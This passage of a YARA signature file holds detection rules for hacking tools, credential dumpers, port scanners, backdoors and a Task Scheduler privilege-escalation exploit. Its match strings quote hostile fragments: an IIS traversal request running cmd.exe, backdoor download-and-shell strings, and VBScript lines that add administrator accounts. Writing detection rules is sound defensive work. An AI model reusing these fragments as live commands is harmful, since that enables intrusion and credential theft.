    $name = "NativePayload_ARP" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_C2Bridge {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/cobbr/C2Bridge"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "C2Bridge" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_Infrastructure_Assessment {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/NyaMeeEain/Infrastructure-Assessment"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "Infrastructure-Assessment" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_shellcodeTester {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/tophertimzen/shellcodeTester"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "shellcodeTester" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_gray_hat_csharp_code {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/brandonprry/gray_hat_csharp_code"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "gray_hat_csharp_code" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_NativePayload_ReverseShell {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/DamonMohammadbagher/NativePayload_ReverseShell"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "NativePayload_ReverseShell" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_DotNetAVBypass {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/mandreko/DotNetAVBypass"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "DotNetAVBypass" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_HexyRunner {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/bao7uo/HexyRunner"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "HexyRunner" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_SharpOffensiveShell {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/darkr4y/SharpOffensiveShell"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "SharpOffensiveShell" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_reconness {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/reconness/reconness"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "reconness" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_tvasion {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/loadenmb/tvasion"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "tvasion" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_ibombshell {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/Telefonica/ibombshell"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "ibombshell" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_RemoteProcessInjection {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/Mr-Un1k0d3r/RemoteProcessInjection"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "RemoteProcessInjection" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_njRAT_0_7d_Stub_CSharp {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/NYAN-x-CAT/njRAT-0.7d-Stub-CSharp"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "njRAT-0.7d-Stub-CSharp" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_CACTUSTORCH {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/mdsecactivebreach/CACTUSTORCH"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "CACTUSTORCH" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_PandaSniper {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/QAX-A-Team/PandaSniper"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "PandaSniper" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_xbapAppWhitelistBypassPOC {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/jpginc/xbapAppWhitelistBypassPOC"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "xbapAppWhitelistBypassPOC" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_StageStrike {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/RedXRanger/StageStrike"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "StageStrike" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_Solarwinds_credential_stealer {
  meta:
    description = "Detects solarwinds credential stealers like e.g. solarflare via the touched certificate, files and database columns"
    reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware"
    reference = "https://github.com/mubix/solarflare"
    author = "Arnim Rupp"
    date = "2021-01-20"
    hash = "1b2e5186464ed0bdd38fcd9f4ab294a7ba28bd829bf296584cbc32e2889037e4"
    hash = "4adb69d4222c80d97f8d64e4d48b574908a518f8d504f24ce93a18b90bd506dc"
  strings:
    $certificate = "CN=SolarWinds-Orion" ascii wide nocase
    $credfile1 = "\\CredentialStorage\\SolarWindsDatabaseAccessCredential" ascii wide nocase
    $credfile2 = "\\KeyStorage\\CryptoHelper\\default.dat" ascii wide nocase
    $credfile3 = "\\Orion\\SWNetPerfMon.DB" ascii wide nocase
    $credfile4 = "\\Orion\\RabbitMQ\\.erlang.cookie" ascii wide nocase
    $sql1 = "encryptedkey" ascii wide nocase fullword
    $sql2 = "protectiontype" ascii wide nocase fullword
    $sql3 = "CredentialProperty" ascii wide nocase fullword
    $sql4 = "passwordhash" ascii wide nocase fullword
    $sql5 = "credentialtype" ascii wide nocase fullword
    $sql6 = "passwordsalt" ascii wide nocase fullword
  condition:
    uint16(0) == 23117 and $certificate and (2 of ($credfile*) or 5 of ($sql*))
}

rule WindowsCredentialEditor {
  meta:
    description = "Windows Credential Editor"
    threat_level = 10
    score = 90
  strings:
    $a = "extract the TGT session key"
    $b = "Windows Credentials Editor"
  condition:
    $a or $b
}

rule Amplia_Security_Tool {
  meta:
    description = "Amplia Security Tool"
    score = 60
    nodeepdive = 1
  strings:
    $a = "Amplia Security"
    $b = "Hernan Ochoa"
    $c = "getlsasrvaddr.exe"
    $d = "Cannot get PID of LSASS.EXE"
    $e = "extract the TGT session key"
    $f = "PPWDUMP_DATA"
  condition:
    1 of them
}

rule PwDump {
  meta:
    description = "PwDump 6 variant"
    author = "Marc Stroebel"
    date = "2014-04-24"
    score = 70
  strings:
    $s5 = "Usage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machineNa"
    $s6 = "Unable to query service status. Something is wrong, please manually check the st"
    $s7 = "pwdump6 Version %s by fizzgig and the mighty group at foofus.net" fullword
  condition:
    all of them
}

rule PScan_Portscan_1 {
  meta:
    description = "PScan - Port Scanner"
    author = "F. Roth"
    score = 50
  strings:
    $a = "00050;0F0M0X0a0v0}0"
    $b = "vwgvwgvP76"
    $c = "Pr0PhOFyP"
  condition:
    all of them
}

rule HackTool_Samples {
  meta:
    description = "Hacktool"
    score = 50
  strings:
    $a = "Unable to uninstall the fgexec service"
    $b = "Unable to set socket to sniff"
    $c = "Failed to load SAM functions"
    $d = "Dump system passwords"
    $e = "Error opening sam hive or not valid file"
    $f = "Couldn't find LSASS pid"
    $g = "samdump.dll"
    $h = "WPEPRO SEND PACKET"
    $i = "WPE-C1467211-7C89-49c5-801A-1D048E4014C4"
    $j = "Usage: unshadow PASSWORD-FILE SHADOW-FILE"
    $k = "arpspoof\\Debug"
    $l = "Success: The log has been cleared"
    $m = "clearlogs [\\\\computername"
    $n = "DumpUsers 1."
    $o = "dictionary attack with specified dictionary file"
    $p = "by Objectif Securite"
    $q = "objectif-securite"
    $r = "Cannot query LSA Secret on remote host"
    $s = "Cannot write to process memory on remote host"
    $t = "Cannot start PWDumpX service on host"
    $u = "usage: %s <system hive> <security hive>"
    $v = "username:domainname:LMhash:NThash"
    $w = "<server_name_or_ip> | -f <server_list_file> [username] [password]"
    $x = "Impersonation Tokens Available"
    $y = "failed to parse pwdump format string"
    $z = "Dumping password"
  condition:
    1 of them
}

rule Fierce2 {
  meta:
    author = "Florian Roth"
    description = "This signature detects the Fierce2 domain scanner"
    date = "07/2014"
    score = 60
  strings:
    $s1 = "$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,"
  condition:
    1 of them
}

rule Ncrack {
  meta:
    author = "Florian Roth"
    description = "This signature detects the Ncrack brute force tool"
    date = "07/2014"
    score = 60
  strings:
    $s1 = "NcrackOutputTable only supports adding up to 4096 to a cell via"
  condition:
    1 of them
}

rule SQLMap {
  meta:
    author = "Florian Roth"
    description = "This signature detects the SQLMap SQL injection tool"
    date = "07/2014"
    score = 60
  strings:
    $s1 = "except SqlmapBaseException, ex:"
  condition:
    1 of them
}

rule PortScanner {
  meta:
    description = "Auto-generated rule on file PortScanner.exe"
    author = "yarGen Yara Rule Generator by Florian Roth"
    hash = "b381b9212282c0c650cb4b0323436c63"
  strings:
    $s0 = "Scan Ports Every"
    $s3 = "Scan All Possible Ports!"
  condition:
    all of them
}

rule DomainScanV1_0 {
  meta:
    description = "Auto-generated rule on file DomainScanV1_0.exe"
    author = "yarGen Yara Rule Generator by Florian Roth"
    hash = "aefcd73b802e1c2bdc9b2ef206a4f24e"
  strings:
    $s0 = "dIJMuX$aO-EV"
    $s1 = "XELUxP\"-\\"
    $s2 = "KaR\"U'}-M,."
    $s3 = "V.)\\ZDxpLSav"
    $s4 = "Decompress error"
    $s5 = "Can't load library"
    $s6 = "Can't load function"
    $s7 = "com0tl32:.d"
  condition:
    all of them
}

rule MooreR_Port_Scanner {
  meta:
    description = "Auto-generated rule on file MooreR Port Scanner.exe"
    author = "yarGen Yara Rule Generator by Florian Roth"
    hash = "376304acdd0b0251c8b19fea20bb6f5b"
  strings:
    $s0 = "Description|"
    $s3 = "soft Visual Studio\\VB9yp"
    $s4 = "adj_fptan?4"
    $s7 = "DOWS\\SyMem32\\/o"
  condition:
    all of them
}

rule NetBIOS_Name_Scanner {
  meta:
    description = "Auto-generated rule on file NetBIOS Name Scanner.exe"
    author = "yarGen Yara Rule Generator by Florian Roth"
    hash = "888ba1d391e14c0a9c829f5a1964ca2c"
  strings:
    $s0 = "IconEx"
    $s2 = "soft Visual Stu"
    $s4 = "NBTScanner!y&"
  condition:
    all of them
}

rule FeliksPack3___Scanners_ipscan {
  meta:
    description = "Auto-generated rule on file ipscan.exe"
    author = "yarGen Yara Rule Generator by Florian Roth"
    hash = "6c1bcf0b1297689c8c4c12cc70996a75"
  strings:
    $s2 = "WCAP;}ECTED"
    $s4 = "NotSupported"
    $s6 = "SCAN.VERSION{_"
  condition:
    all of them
}

rule CGISscan_CGIScan {
  meta:
    description = "Auto-generated rule on file CGIScan.exe"
    author = "yarGen Yara Rule Generator by Florian Roth"
    hash = "338820e4e8e7c943074d5a5bc832458a"
  strings:
    $s1 = "Wang Products" wide fullword
    $s2 = "WSocketResolveHost: Cannot convert host address '%s'"
    $s3 = "tcp is the only protocol supported thru socks server"
  condition:
    all of ($s*)
}

rule IP_Stealing_Utilities {
  meta:
    description = "Auto-generated rule on file IP Stealing Utilities.exe"
    author = "yarGen Yara Rule Generator by Florian Roth"
    hash = "65646e10fb15a2940a37c5ab9f59c7fc"
  strings:
    $s0 = "DarkKnight"
    $s9 = "IPStealerUtilities"
  condition:
    all of them
}

rule SuperScan4 {
  meta:
    description = "Auto-generated rule on file SuperScan4.exe"
    author = "yarGen Yara Rule Generator by Florian Roth"
    hash = "78f76428ede30e555044b83c47bc86f0"
  strings:
    $s2 = " td class=\"summO1\">"
    $s6 = "REM'EBAqRISE"
    $s7 = "CorExitProcess'msc#e"
  condition:
    all of them
}

rule PortRacer {
  meta:
    description = "Auto-generated rule on file PortRacer.exe"
    author = "yarGen Yara Rule Generator by Florian Roth"
    hash = "2834a872a0a8da5b1be5db65dfdef388"
  strings:
    $s0 = "Auto Scroll BOTH Text Boxes"
    $s4 = "Start/Stop Portscanning"
    $s6 = "Auto Save LogFile by pressing STOP"
  condition:
    all of them
}

rule scanarator {
  meta:
    description = "Auto-generated rule on file scanarator.exe"
    author = "yarGen Yara Rule Generator by Florian Roth"
    hash = "848bd5a518e0b6c05bd29aceb8536c46"
  strings:
    $s4 = "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
  condition:
    all of them
}

rule aolipsniffer {
  meta:
    description = "Auto-generated rule on file aolipsniffer.exe"
    author = "yarGen Yara Rule Generator by Florian Roth"
    hash = "51565754ea43d2d57b712d9f0a3e62b8"
  strings:
    $s0 = "C:\\Program Files\\Microsoft Visual Studio\\VB98\\VB6.OLB"
    $s1 = "dwGetAddressForObject"
    $s2 = "Color Transfer Settings"
    $s3 = "FX Global Lighting Angle"
    $s4 = "Version compatibility info"
    $s5 = "New Windows Thumbnail"
    $s6 = "Layer ID Generator Base"
    $s7 = "Color Halftone Settings"
    $s8 = "C:\\WINDOWS\\SYSTEM\\MSWINSCK.oca"
  condition:
    all of them
}

rule _Bitchin_Threads_ {
  meta:
    description = "Auto-generated rule on file =Bitchin Threads=.exe"
    author = "yarGen Yara Rule Generator by Florian Roth"
    hash = "7491b138c1ee5a0d9d141fbfd1f0071b"
  strings:
    $s0 = "DarKPaiN"
    $s1 = "=BITCHIN THREADS"
  condition:
    all of them
}

rule cgis4_cgis4 {
  meta:
    description = "Auto-generated rule on file cgis4.exe"
    author = "yarGen Yara Rule Generator by Florian Roth"
    hash = "d658dad1cd759d7f7d67da010e47ca23"
  strings:
    $s0 = ")PuMB_syJ"
    $s1 = "&,fARW>yR"
    $s2 = "m3hm3t_rullaz"
    $s3 = "7Projectc1"
    $s4 = "Ten-GGl\""
    $s5 = "/Moziqlxa"
  condition:
    all of them
}

rule portscan {
  meta:
    description = "Auto-generated rule on file portscan.exe"
    author = "yarGen Yara Rule Generator by Florian Roth"
    hash = "a8bfdb2a925e89a281956b1e3bb32348"
  strings:
    $s5 = "0    :SCAN BEGUN ON PORT:"
    $s6 = "0    :PORTSCAN READY."
  condition:
    all of them
}

rule ProPort_zip_Folder_ProPort {
  meta:
    description = "Auto-generated rule on file ProPort.exe"
    author = "yarGen Yara Rule Generator by Florian Roth"
    hash = "c1937a86939d4d12d10fc44b7ab9ab27"
  strings:
    $s0 = "Corrupt Data!"
    $s1 = "K4p~omkIz"
    $s2 = "DllTrojanScan"
    $s3 = "GetDllInfo"
    $s4 = "Compressed by Petite (c)1999 Ian Luck."
    $s5 = "GetFileCRC32"
    $s6 = "GetTrojanNumber"
    $s7 = "TFAKAbout"
  condition:
    all of them
}

rule StealthWasp_s_Basic_PortScanner_v1_2 {
  meta:
    description = "Auto-generated rule on file StealthWasp's Basic PortScanner v1.2.exe"
    author = "yarGen Yara Rule Generator by Florian Roth"
    hash = "7c0f2cab134534cd35964fe4c6a1ff00"
  strings:
    $s1 = "Basic PortScanner"
    $s6 = "Now scanning port:"
  condition:
    all of them
}

rule BluesPortScan {
  meta:
    description = "Auto-generated rule on file BluesPortScan.exe"
    author = "yarGen Yara Rule Generator by Florian Roth"
    hash = "6292f5fc737511f91af5e35643fc9eef"
  strings:
    $s0 = "This program was made by Volker Voss"
    $s1 = "JiBOo~SSB"
  condition:
    all of them
}

rule scanarator_iis {
  meta:
    description = "Auto-generated rule on file iis.exe"
    author = "yarGen Yara Rule Generator by Florian Roth"
    hash = "3a8fc02c62c8dd65e038cc03e5451b6e"
  strings:
    $s0 = "example: iis 10.10.10.10"
    $s1 = "send error"
  condition:
    all of them
}

rule stealth_Stealth {
  meta:
    description = "Auto-generated rule on file Stealth.exe"
    author = "yarGen Yara Rule Generator by Florian Roth"
    hash = "8ce3a386ce0eae10fc2ce0177bbc8ffa"
  strings:
    $s3 = "<table width=\"60%\" bgcolor=\"black\" cellspacing=\"0\" cellpadding=\"2\" border=\"1\" bordercolor=\"white\"><tr><td>"
    $s6 = "This tool may be used only by system administrators. I am not responsible for "
  condition:
    all of them
}

rule Angry_IP_Scanner_v2_08_ipscan {
  meta:
    description = "Auto-generated rule on file ipscan.exe"
    author = "yarGen Yara Rule Generator by Florian Roth"
    hash = "70cf2c09776a29c3e837cb79d291514a"
  strings:
    $s0 = "_H/EnumDisplay/"
    $s5 = "ECTED.MSVCRT0x"
    $s8 = "NotSupported7"
  condition:
    all of them
}

rule crack_Loader {
  meta:
    description = "Auto-generated rule on file Loader.exe"
    author = "yarGen Yara Rule Generator by Florian Roth"
    hash = "f4f79358a6c600c1f0ba1f7e4879a16d"
  strings:
    $s0 = "NeoWait.exe"
    $s1 = "RRRRRRRW"
  condition:
    all of them
}

rule CN_GUI_Scanner {
  meta:
    description = "Detects an unknown GUI scanner tool - CN background"
    author = "Florian Roth"
    hash = "3c67bbb1911cdaef5e675c56145e1112"
    score = 65
    date = "04.10.2014"
  strings:
    $s1 = "good.txt" ascii fullword
    $s2 = "IP.txt" ascii fullword
    $s3 = "xiaoyuer" ascii fullword
    $s0w = "ssh(" wide fullword
    $s1w = ").exe" wide fullword
  condition:
    all of them
}

rule CN_Packed_Scanner {
  meta:
    description = "Suspiciously packed executable"
    author = "Florian Roth"
    hash = "6323b51c116a77e3fba98f7bb7ff4ac6"
    score = 40
    date = "06.10.2014"
  strings:
    $s1 = "kernel32.dll" ascii fullword
    $s2 = "CRTDLL.DLL" ascii fullword
    $s3 = "__GetMainArgs" ascii fullword
    $s4 = "WS2_32.DLL" ascii fullword
  condition:
    all of them and filesize < 184320 and filesize > 71680
}

rule Tiny_Network_Tool_Generic {
  meta:
    description = "Tiny tool with suspicious function imports. (Rule based on WinEggDrop Scanner samples)"
    author = "Florian Roth"
    date = "08.10.2014"
    score = 40
    type = "file"
    hash0 = "9e1ab25a937f39ed8b031cd8cfbc4c07"
    hash1 = "cafc31d39c1e4721af3ba519759884b9"
    hash2 = "8e635b9a1e5aa5ef84bfa619bd2a1f92"
  strings:
    $magic = { 4D 5A }
    $s0 = "KERNEL32.DLL" ascii fullword
    $s1 = "CRTDLL.DLL" ascii fullword
    $s3 = "LoadLibraryA" ascii fullword
    $s4 = "GetProcAddress" ascii fullword
    $y1 = "WININET.DLL" ascii fullword
    $y2 = "atoi" ascii fullword
    $x1 = "ADVAPI32.DLL" ascii fullword
    $x2 = "USER32.DLL" ascii fullword
    $x3 = "wsock32.dll" ascii fullword
    $x4 = "FreeSid" ascii fullword
    $x5 = "atoi" ascii fullword
    $z1 = "ADVAPI32.DLL" ascii fullword
    $z2 = "USER32.DLL" ascii fullword
    $z3 = "FreeSid" ascii fullword
    $z4 = "ToAscii" ascii fullword
  condition:
    ($magic at 0) and all of ($s*) and (all of ($y*) or all of ($x*) or all of ($z*)) and filesize < 15360
}

rule Beastdoor_Backdoor {
  meta:
    description = "Detects the backdoor Beastdoor"
    author = "Florian Roth"
    score = 55
    hash = "5ab10dda548cb821d7c15ebcd0a9f1ec6ef1a14abcc8ad4056944d060c49535a"
  strings:
    $s0 = "Redirect SPort RemoteHost RPort  -->Port Redirector" fullword
    $s1 = "POST /scripts/WWPMsg.dll HTTP/1.0" fullword
    $s2 = "http://IP/a.exe a.exe            -->Download A File" fullword
    $s7 = "Host: wwp.mirabilis.com:80" fullword
    $s8 = "%s -Set Port PortNumber              -->Set The Service Port" fullword
    $s11 = "Shell                            -->Get A Shell" fullword
    $s14 = "DeleteService ServiceName        -->Delete A Service" fullword
    $s15 = "Getting The UserName(%c%s%c)-->ID(0x%s) Successfully" fullword
    $s17 = "%s -Set ServiceName ServiceName      -->Set The Service Name" fullword
  condition:
    2 of them
}

rule Powershell_Netcat {
  meta:
    description = "Detects a Powershell version of the Netcat network hacking tool"
    author = "Florian Roth"
    score = 60
    date = "10.10.2014"
  strings:
    $s0 = "[ValidateRange(1, 65535)]" fullword
    $s1 = "$Client = New-Object -TypeName System.Net.Sockets.TcpClient" fullword
    $s2 = "$Buffer = New-Object -TypeName System.Byte[] -ArgumentList $Client.ReceiveBufferSize" fullword
  condition:
    all of them
}

rule Chinese_Hacktool_1014 {
  meta:
    description = "Detects a chinese hacktool with unknown use"
    author = "Florian Roth"
    score = 60
    date = "10.10.2014"
    hash = "98c07a62f7f0842bcdbf941170f34990"
  strings:
    $s0 = "IEXT2_IDC_HORZLINEMOVECURSOR" wide fullword
    $s1 = "msctls_progress32" wide fullword
    $s2 = "Reply-To: %s" ascii fullword
    $s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" ascii fullword
    $s4 = "html htm htx asp" ascii fullword
  condition:
    all of them
}

rule CN_Hacktool_BAT_PortsOpen {
  meta:
    description = "Detects a chinese BAT hacktool for local port evaluation"
    author = "Florian Roth"
    score = 60
    date = "12.10.2014"
  strings:
    $s0 = "for /f \"skip=4 tokens=2,5\" %%a in ('netstat -ano -p TCP') do (" ascii
    $s1 = "in ('tasklist /fi \"PID eq %%b\" /FO CSV') do " ascii
    $s2 = "@echo off" ascii
  condition:
    all of them
}

rule CN_Hacktool_SSPort_Portscanner {
  meta:
    description = "Detects a chinese Portscanner named SSPort"
    author = "Florian Roth"
    score = 70
    date = "12.10.2014"
  strings:
    $s0 = "Golden Fox" wide fullword
    $s1 = "Syn Scan Port" wide fullword
    $s2 = "CZ88.NET" wide fullword
  condition:
    all of them
}

rule CN_Hacktool_ScanPort_Portscanner {
  meta:
    description = "Detects a chinese Portscanner named ScanPort"
    author = "Florian Roth"
    score = 70
    date = "12.10.2014"
  strings:
    $s0 = "LScanPort" wide fullword
    $s1 = "LScanPort Microsoft" wide fullword
    $s2 = "www.yupsoft.com" wide fullword
  condition:
    all of them
}

rule CN_Hacktool_S_EXE_Portscanner {
  meta:
    description = "Detects a chinese Portscanner named s.exe"
    author = "Florian Roth"
    score = 70
    date = "12.10.2014"
  strings:
    $s0 = "\\Result.txt" ascii fullword
    $s1 = "By:ZT QQ:376789051" ascii fullword
    $s2 = "(http://www.eyuyan.com)" wide fullword
  condition:
    all of them
}

rule CN_Hacktool_MilkT_BAT {
  meta:
    description = "Detects a chinese Portscanner named MilkT - shipped BAT"
    author = "Florian Roth"
    score = 70
    date = "12.10.2014"
  strings:
    $s0 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" ascii
    $s1 = "if not \"%Choice%\"==\"\" set Choice=%Choice:~0,1%" ascii
  condition:
    all of them
}

rule CN_Hacktool_MilkT_Scanner {
  meta:
    description = "Detects a chinese Portscanner named MilkT"
    author = "Florian Roth"
    score = 60
    date = "12.10.2014"
  strings:
    $s0 = "Bf **************" ascii fullword
    $s1 = "forming Time: %d/" ascii
    $s2 = "KERNEL32.DLL" ascii fullword
    $s3 = "CRTDLL.DLL" ascii fullword
    $s4 = "WS2_32.DLL" ascii fullword
    $s5 = "GetProcAddress" ascii fullword
    $s6 = "atoi" ascii fullword
  condition:
    all of them
}

rule CN_Hacktool_1433_Scanner {
  meta:
    description = "Detects a chinese MSSQL scanner"
    author = "Florian Roth"
    score = 40
    date = "12.10.2014"
  strings:
    $magic = { 4D 5A }
    $s0 = "1433" wide fullword
    $s1 = "1433V" wide
    $s2 = "del Weak1.txt" ascii fullword
    $s3 = "del Attack.txt" ascii fullword
    $s4 = "del /s /Q C:\\Windows\\system32\\doors\\" ascii fullword
    $s5 = "!&start iexplore http://www.crsky.com/soft/4818.html)" ascii fullword
  condition:
    ($magic at 0) and all of ($s*)
}

rule CN_Hacktool_1433_Scanner_Comp2 {
  meta:
    description = "Detects a chinese MSSQL scanner - component 2"
    author = "Florian Roth"
    score = 40
    date = "12.10.2014"
  strings:
    $magic = { 4D 5A }
    $s0 = "1433" wide fullword
    $s1 = "1433V" wide
    $s2 = "UUUMUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUMUUU" ascii fullword
  condition:
    ($magic at 0) and all of ($s*)
}

rule WCE_Modified_1_1014 {
  meta:
    description = "Modified (packed) version of Windows Credential Editor"
    author = "Florian Roth"
    hash = "09a412ac3c85cedce2642a19e99d8f903a2e0354"
    score = 70
  strings:
    $s0 = "LSASS.EXE" ascii fullword
    $s1 = "_CREDS" ascii
    $s9 = "Using WCE " ascii
  condition:
    all of them
}

rule ReactOS_cmd_valid {
  meta:
    description = "ReactOS cmd.exe with correct file name - maybe packed with software or part of hacker toolset"
    author = "Florian Roth"
    date = "05.11.14"
    reference = "http://www.elifulkerson.com/articles/suzy-sells-cmd-shells.php"
    score = 30
    hash = "b88f050fa69d85af3ff99af90a157435296cbb6e"
  strings:
    $s1 = "ReactOS Command Processor" wide fullword
    $s2 = "Copyright (C) 1994-1998 Tim Norman and others" wide fullword
    $s3 = "Eric Kohl and others" wide fullword
    $s4 = "ReactOS Operating System" wide fullword
  condition:
    all of ($s*)
}

rule iKAT_wmi_rundll {
  meta:
    description = "This exe will attempt to use WMI to Call the Win32_Process event to spawn rundll - file wmi_rundll.exe"
    author = "Florian Roth"
    date = "05.11.14"
    score = 65
    reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
    hash = "97c4d4e6a644eed5aa12437805e39213e494d120"
  strings:
    $s0 = "This operating system is not supported." ascii fullword
    $s1 = "Error!" ascii fullword
    $s2 = "Win32 only!" ascii fullword
    $s3 = "COMCTL32.dll" ascii fullword
    $s4 = "[LordPE]" ascii
    $s5 = "CRTDLL.dll" ascii fullword
    $s6 = "VBScript" ascii fullword
    $s7 = "CoUninitialize" ascii fullword
  condition:
    all of them and filesize < 15360
}

rule iKAT_revelations {
  meta:
    description = "iKAT hack tool showing the content of password fields - file revelations.exe"
    author = "Florian Roth"
    date = "05.11.14"
    score = 75
    reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
    hash = "c4e217a8f2a2433297961561c5926cbd522f7996"
  strings:
    $s0 = "The RevelationHelper.DLL file is corrupt or missing." ascii fullword
    $s8 = "BETAsupport@snadboy.com" wide fullword
    $s9 = "support@snadboy.com" wide fullword
    $s14 = "RevelationHelper.dll" ascii fullword
  condition:
    all of them
}

rule iKAT_priv_esc_tasksch {
  meta:
    description = "Task Schedulder Local Exploit - Windows local priv-esc using Task Scheduler, published by webDevil. Supports Windows 7 and Vista."
    author = "Florian Roth"
    date = "05.11.14"
    score = 75
    reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
    hash = "84ab94bff7abf10ffe4446ff280f071f9702cf8b"
  strings:
    $s0 = "objShell.Run \"schtasks /change /TN wDw00t /disable\",,True" ascii fullword
    $s3 = "objShell.Run \"schtasks /run /TN wDw00t\",,True" ascii fullword
    $s4 = "'objShell.Run \"cmd /c copy C:\\windows\\system32\\tasks\\wDw00t .\",,True" ascii fullword
    $s6 = "a.WriteLine (\"schtasks /delete /f /TN wDw00t\")" ascii fullword
    $s7 = "a.WriteLine (\"net user /add ikat ikat\")" ascii fullword
    $s8 = "a.WriteLine (\"cmd.exe\")" ascii fullword
    $s9 = "strFileName=\"C:\\windows\\system32\\tasks\\wDw00t\"" ascii fullword
    $s10 = "For n = 1 To (Len (hexXML) - 1) step 2" ascii fullword
    $s13 = "output.writeline \" Should work on Vista/Win7/2008 x86/x64\"" ascii fullword
    $s11 = "Set objExecObject = objShell.Exec(\"cmd /c schtasks /query /XML /TN wDw00t\")" ascii fullword
    $s12 = "objShell.Run \"schtasks /create /TN wDw00t /sc monthly /tr \"\"\"+biatchFile+\"" ascii
    $s14 = "a.WriteLine (\"net localgroup administrators /add v4l\")" ascii fullword
